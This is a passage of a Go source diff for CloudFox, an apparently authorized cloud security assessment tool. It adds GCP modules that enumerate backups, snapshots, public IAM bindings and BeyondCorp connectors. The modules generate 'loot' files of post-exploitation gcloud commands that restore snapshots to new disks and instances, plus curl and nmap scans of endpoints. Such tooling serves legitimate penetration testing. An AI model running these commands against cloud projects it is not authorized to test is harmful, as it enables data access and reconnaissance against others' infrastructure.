------------------------------ +func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Inventorying backup configurations...", GCP_BACKUPINVENTORY_MODULE_NAME) + + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL Admin service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, sqlService, logger) + }(projectID) + } + 
wg.Wait() + + // Identify unprotected resources + m.identifyUnprotectedResources() + + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + if len(allResources) == 0 && len(allSnapshots) == 0 { + logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + // Count protected vs unprotected + protectedCount := 0 + unprotectedCount := 0 + for _, r := range allResources { + if r.Protected { + protectedCount++ + } else { + unprotectedCount++ + } + } + + // Count public snapshots + publicSnapshotCount := 0 + for _, s := range allSnapshots { + if s.PublicAccess { + publicSnapshotCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", + len(allResources), protectedCount, unprotectedCount, len(allSnapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) + + if unprotectedCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + if publicSnapshotCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible snapshot(s)!", publicSnapshotCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BackupInventoryModule) getAllResources() []BackupResource { + var all []BackupResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BackupInventoryModule) getAllSnapshots() []ComputeSnapshot { + var all []ComputeSnapshot + for _, snapshots := range m.ProjectSnapshots { + all = append(all, snapshots...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *BackupInventoryModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // List all disks first (for gap analysis) + m.enumerateDisks(ctx, projectID, computeService, logger) + + // List snapshots + m.enumerateSnapshots(ctx, projectID, computeService, logger) + + // List SQL instances and backups + if sqlService != nil { + m.enumerateSQLBackups(ctx, projectID, sqlService, logger) + } +} + +func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + m.mu.Lock() + m.allDisks[disk.SelfLink] = diskInfo{ + SizeGB: disk.SizeGb, + Zone: m.extractZoneFromURL(zone), + ProjectID: projectID, + Name: disk.Name, + } + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func 
(m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + // Determine encryption type and KMS key name + encryptionType := "Google-managed" + kmsKeyName := "" + if snapshot.SnapshotEncryptionKey != nil { + if snapshot.SnapshotEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKeyName = snapshot.SnapshotEncryptionKey.KmsKeyName + } else if snapshot.SnapshotEncryptionKey.RawKey != "" || snapshot.SnapshotEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + + snap := ComputeSnapshot{ + ProjectID: projectID, + Name: snapshot.Name, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + StorageLocats: snapshot.StorageLocations, + AutoCreated: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + EncryptionType: encryptionType, + KMSKeyName: kmsKeyName, + } + + // Get IAM policy for this snapshot + iamPolicy, iamErr := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + snap.IAMBindings = append(snap.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + snap.PublicAccess = true + } + } + } + } + + m.mu.Lock() + m.ProjectSnapshots[projectID] = append(m.ProjectSnapshots[projectID], snap) + m.disksWithBackups[snapshot.SourceDisk] = true + + // Add post-exploit commands for snapshots + if m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["backup-inventory-commands"]; lootFile != nil { + // Determine a zone 
from storage locations or use a default + zone := "us-central1-a" + if len(snapshot.StorageLocations) > 0 { + zone = snapshot.StorageLocations[0] + "-a" + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# SNAPSHOT: %s (Source: %s, Size: %dGB)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Create a disk from this snapshot\n"+ + "gcloud compute disks create disk-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --source-snapshot=%s\n\n"+ + "# Create an instance using a disk from this snapshot\n"+ + "gcloud compute instances create instance-from-%s \\\n"+ + " --project=%s \\\n"+ + " --zone=%s \\\n"+ + " --disk=name=disk-from-%s,boot=yes\n\n", + snapshot.Name, m.extractDiskName(snapshot.SourceDisk), snapshot.DiskSizeGb, + snapshot.Name, projectID, zone, snapshot.Name, + snapshot.Name, projectID, zone, snapshot.Name, + ) + } + } + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshots in project %s", projectID)) + } + + // Track protected resources from snapshots + m.trackSnapshotProtection(projectID) +} + +func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + m.mu.Lock() + projectSnapshots := m.ProjectSnapshots[projectID] + m.mu.Unlock() + + // Group snapshots by source disk + diskSnapshots := make(map[string][]ComputeSnapshot) + for _, snap := range projectSnapshots { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) + } + + m.mu.Lock() + defer m.mu.Unlock() + + for diskURL, snaps := range diskSnapshots { + // Find latest snapshot + var latestTime time.Time + var latestSnap ComputeSnapshot + for _, snap := range snaps { + t, err := time.Parse(time.RFC3339, snap.CreationTime) + if err == nil && t.After(latestTime) { + latestTime 
= t + latestSnap = snap + } + } + + diskInfo := m.allDisks[diskURL] + backupStatus := latestSnap.Status + + // Calculate age of last backup + if !latestTime.IsZero() { + age := time.Since(latestTime) + if age > 7*24*time.Hour { + backupStatus = "STALE" + } else { + backupStatus = "CURRENT" + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: m.extractDiskName(diskURL), + ResourceType: "compute-disk", + Location: diskInfo.Zone, + SizeGB: diskInfo.SizeGB, + Protected: true, + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: backupStatus, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), + } + + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) + } +} + +func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + m.mu.Lock() + m.allSQLInstances[instance.Name] = sqlInstanceInfo{ + ProjectID: projectID, + Region: instance.Region, + } + m.mu.Unlock() + + // Check backup configuration + backupEnabled := false + pitrEnabled := false + var retentionDays int + var backupStartTime string + + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backupEnabled = instance.Settings.BackupConfiguration.Enabled + pitrEnabled = instance.Settings.BackupConfiguration.PointInTimeRecoveryEnabled + retentionDays = int(instance.Settings.BackupConfiguration.TransactionLogRetentionDays) + backupStartTime = instance.Settings.BackupConfiguration.StartTime + } + + if backupEnabled { + m.mu.Lock() + m.sqlWithBackups[instance.Name] = true + 
m.mu.Unlock() + + // List actual backups for this instance + backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue + } + + var latestBackupTime string + var latestStatus string + var latestLocation string + backupCount := 0 + + for _, backup := range backups.Items { + backupCount++ + if latestBackupTime == "" || backup.StartTime > latestBackupTime { + latestBackupTime = backup.StartTime + latestStatus = backup.Status + latestLocation = backup.Location + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: instance.Name, + ResourceType: "cloudsql-instance", + Location: instance.Region, + Protected: true, + BackupType: "automated", + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + LastBackup: latestBackupTime, + BackupCount: backupCount, + BackupStatus: latestStatus, + PITREnabled: pitrEnabled, + BackupLocation: latestLocation, + } + + m.mu.Lock() + m.ProjectResources[projectID] = append(m.ProjectResources[projectID], resource) + m.mu.Unlock() + } + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *BackupInventoryModule) identifyUnprotectedResources() { + m.mu.Lock() + defer m.mu.Unlock() + + // Find disks without snapshots + for diskURL, info := range m.allDisks { + if !m.disksWithBackups[diskURL] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: info.Name, + ResourceType: "compute-disk", + Location: info.Zone, + SizeGB: info.SizeGB, + Protected: false, + BackupType: "none", + } + + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) + + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# 
Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + // No loot commands for unprotected disks - these are informational only + } + } + + // Find SQL instances without backups + for instanceName, info := range m.allSQLInstances { + if !m.sqlWithBackups[instanceName] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: instanceName, + ResourceType: "cloudsql-instance", + Location: info.Region, + Protected: false, + BackupType: "none", + } + + m.ProjectResources[info.ProjectID] = append(m.ProjectResources[info.ProjectID], resource) + + // Add to loot (ensure project loot is initialized) + if m.LootMap[info.ProjectID] == nil { + m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) + m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + // No loot commands for unprotected SQL instances - these are informational only + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *BackupInventoryModule) extractDiskName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *BackupInventoryModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { + if zone == "" { + return "" + } + // Zone format: us-central1-a -> Region: us-central1 + parts := strings.Split(zone, "-") + if len(parts) >= 2 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// ------------------------------ +// Output Generation +// 
------------------------------ +func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BackupInventoryModule) getResourcesHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", + } +} + +func (m *BackupInventoryModule) getSnapshotsHeader() []string { + return []string{ + "Project", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Encryption", + "IAM Binding Role", + "IAM Binding Principal", + "Public", + } +} + +func (m *BackupInventoryModule) resourcesToTableBody(resources []BackupResource) [][]string { + var body [][]string + for _, r := range resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" + } + + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } + + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } + + sizeStr := "" + if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } + + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } + return body +} + +func (m *BackupInventoryModule) snapshotsToTableBody(snapshots []ComputeSnapshot) [][]string { + var body [][]string + for _, s := range snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } + + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } + 
+ // Format encryption - show KMS key name if CMEK + encryptionDisplay := s.EncryptionType + if s.EncryptionType == "CMEK" && s.KMSKeyName != "" { + // Extract just the key name from the full path for display + // Format: projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY + keyParts := strings.Split(s.KMSKeyName, "/") + if len(keyParts) >= 2 { + encryptionDisplay = fmt.Sprintf("CMEK (%s)", keyParts[len(keyParts)-1]) + } + } + + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + encryptionDisplay, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + encryptionDisplay, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BackupInventoryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if resources, ok := m.ProjectResources[projectID]; ok && len(resources) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backup-inventory", + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(resources), + }) + } + + if snapshots, ok := m.ProjectSnapshots[projectID]; ok && len(snapshots) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "backup-snapshots", + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(snapshots), + }) + } + + return tableFiles +} + +func (m 
*BackupInventoryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectResources { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSnapshots { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BackupInventoryOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } +} + +func (m *BackupInventoryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + allSnapshots := m.getAllSnapshots() + + var tables []internal.TableFile + + if len(allResources) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: m.getResourcesHeader(), + Body: m.resourcesToTableBody(allResources), + }) + } + + if len(allSnapshots) > 0 { + tables = append(tables, internal.TableFile{ + Name: "backup-snapshots", + Header: m.getSnapshotsHeader(), + Body: m.snapshotsToTableBody(allSnapshots), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot 
:= range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BackupInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go new file mode 100644 index 00000000..59ec47df --- /dev/null +++ b/gcp/commands/beyondcorp.go @@ -0,0 +1,446 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + beyondcorpservice "github.com/BishopFox/cloudfox/gcp/services/beyondcorpService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBeyondCorpCommand = &cobra.Command{ + Use: globals.GCP_BEYONDCORP_MODULE_NAME, + Aliases: []string{"bc", "zero-trust"}, + Short: "Enumerate BeyondCorp Enterprise configurations", + Long: `Enumerate BeyondCorp Enterprise configurations. 
+ +Features: +- Lists app connectors and connections +- Analyzes connection endpoints +- Identifies configuration issues`, + Run: runGCPBeyondCorpCommand, +} + +type BeyondCorpModule struct { + gcpinternal.BaseGCPModule + ProjectAppConnectors map[string][]beyondcorpservice.AppConnectorInfo // projectID -> connectors + ProjectAppConnections map[string][]beyondcorpservice.AppConnectionInfo // projectID -> connections + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type BeyondCorpOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BeyondCorpOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BeyondCorpOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBeyondCorpCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BEYONDCORP_MODULE_NAME) + if err != nil { + return + } + + module := &BeyondCorpModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAppConnectors: make(map[string][]beyondcorpservice.AppConnectorInfo), + ProjectAppConnections: make(map[string][]beyondcorpservice.AppConnectionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BEYONDCORP_MODULE_NAME, m.processProject) + + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + totalCount := len(allConnectors) + len(allConnections) + if totalCount == 0 { + logger.InfoM("No BeyondCorp resources found", globals.GCP_BEYONDCORP_MODULE_NAME) + return + } + + // Count public resources + publicConnectorCount := 0 + publicConnectionCount := 0 + for _, connector := range allConnectors { + if connector.PublicAccess { + publicConnectorCount++ + } + } + for _, conn := range 
allConnections { + if conn.PublicAccess { + publicConnectionCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", + len(allConnectors), len(allConnections)), + globals.GCP_BEYONDCORP_MODULE_NAME) + + if publicConnectorCount > 0 || publicConnectionCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public connector(s), %d public connection(s)!", + publicConnectorCount, publicConnectionCount), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BeyondCorpModule) getAllConnectors() []beyondcorpservice.AppConnectorInfo { + var all []beyondcorpservice.AppConnectorInfo + for _, connectors := range m.ProjectAppConnectors { + all = append(all, connectors...) + } + return all +} + +func (m *BeyondCorpModule) getAllConnections() []beyondcorpservice.AppConnectionInfo { + var all []beyondcorpservice.AppConnectionInfo + for _, connections := range m.ProjectAppConnections { + all = append(all, connections...) + } + return all +} + +func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BeyondCorp in project: %s", projectID), globals.GCP_BEYONDCORP_MODULE_NAME) + } + + svc := beyondcorpservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get app connectors + connectors, err := svc.ListAppConnectors(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connectors in project %s", projectID)) + } + 
m.mu.Lock() + m.ProjectAppConnectors[projectID] = connectors + for _, connector := range connectors { + m.addConnectorToLoot(projectID, connector) + } + m.mu.Unlock() + + // Get app connections + connections, err := svc.ListAppConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BEYONDCORP_MODULE_NAME, + fmt.Sprintf("Could not list app connections in project %s", projectID)) + } + m.mu.Lock() + m.ProjectAppConnections[projectID] = connections + for _, conn := range connections { + m.addConnectionToLoot(projectID, conn) + } + m.mu.Unlock() +} + +func (m *BeyondCorpModule) addConnectionToLoot(projectID string, conn beyondcorpservice.AppConnectionInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Endpoint: %s\n"+ + "# Gateway: %s\n"+ + "# Connectors: %s\n", + conn.Name, conn.ProjectID, conn.Location, conn.State, + conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this app connection: +gcloud beta beyondcorp app connections describe %s --location=%s --project=%s + +# List IAM policy for this connection: +gcloud beta beyondcorp app connections get-iam-policy %s --location=%s --project=%s + +# List all app connectors in the project: +gcloud beta beyondcorp app connectors list --location=%s --project=%s + +# List all app connections in the project: +gcloud beta beyondcorp app connections list --location=%s --project=%s + +`, conn.Name, conn.Location, conn.ProjectID, + conn.Name, conn.Location, conn.ProjectID, + conn.Location, conn.ProjectID, + 
conn.Location, conn.ProjectID) + + // Exploitation commands + if conn.ApplicationEndpoint != "" { + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Test connectivity to application endpoint:\n"+ + "curl -v %s\n\n"+ + "# Scan endpoint for open ports (if IP-based):\n"+ + "nmap -sV %s\n\n", + conn.ApplicationEndpoint, conn.ApplicationEndpoint) + } + + if conn.PublicAccess { + lootFile.Contents += "# [FINDING] This connection has PUBLIC access!\n" + + "# Check IAM bindings for allUsers/allAuthenticatedUsers\n\n" + } +} + +func (m *BeyondCorpModule) addConnectorToLoot(projectID string, connector beyondcorpservice.AppConnectorInfo) { + lootFile := m.LootMap[projectID]["beyondcorp-details"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONNECTOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n", + connector.Name, connector.ProjectID, connector.Location, + connector.State, connector.PrincipalInfo) + + lootFile.Contents += fmt.Sprintf(` +# Describe this connector: +gcloud beta beyondcorp app connectors describe %s --location=%s --project=%s + +# Get IAM policy for this connector: +gcloud beta beyondcorp app connectors get-iam-policy %s --location=%s --project=%s + +`, connector.Name, connector.Location, connector.ProjectID, + connector.Name, connector.Location, connector.ProjectID) + + if connector.PublicAccess { + lootFile.Contents += "# [FINDING] This connector has PUBLIC access!\n\n" + } +} + +func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BeyondCorpModule) getConnectorsHeader() []string { + return 
[]string{"Project", "Name", "Location", "State", "Service Account", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BeyondCorpModule) getConnectionsHeader() []string { + return []string{"Project", "Name", "Location", "State", "Endpoint", "Gateway", "IAM Binding Role", "IAM Binding Principal", "Public"} +} + +func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice.AppConnectorInfo) [][]string { + var body [][]string + for _, connector := range connectors { + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m *BeyondCorpModule) connectionsToTableBody(connections []beyondcorpservice.AppConnectionInfo) [][]string { + var body [][]string + for _, conn := range connections { + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } + + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + return body +} + +func (m 
*BeyondCorpModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if connectors, ok := m.ProjectAppConnectors[projectID]; ok && len(connectors) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(connectors), + }) + } + + if connections, ok := m.ProjectAppConnections[projectID]; ok && len(connections) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "beyondcorp-connections", + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(connections), + }) + } + + return tableFiles +} + +func (m *BeyondCorpModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAppConnectors { + projectIDs[projectID] = true 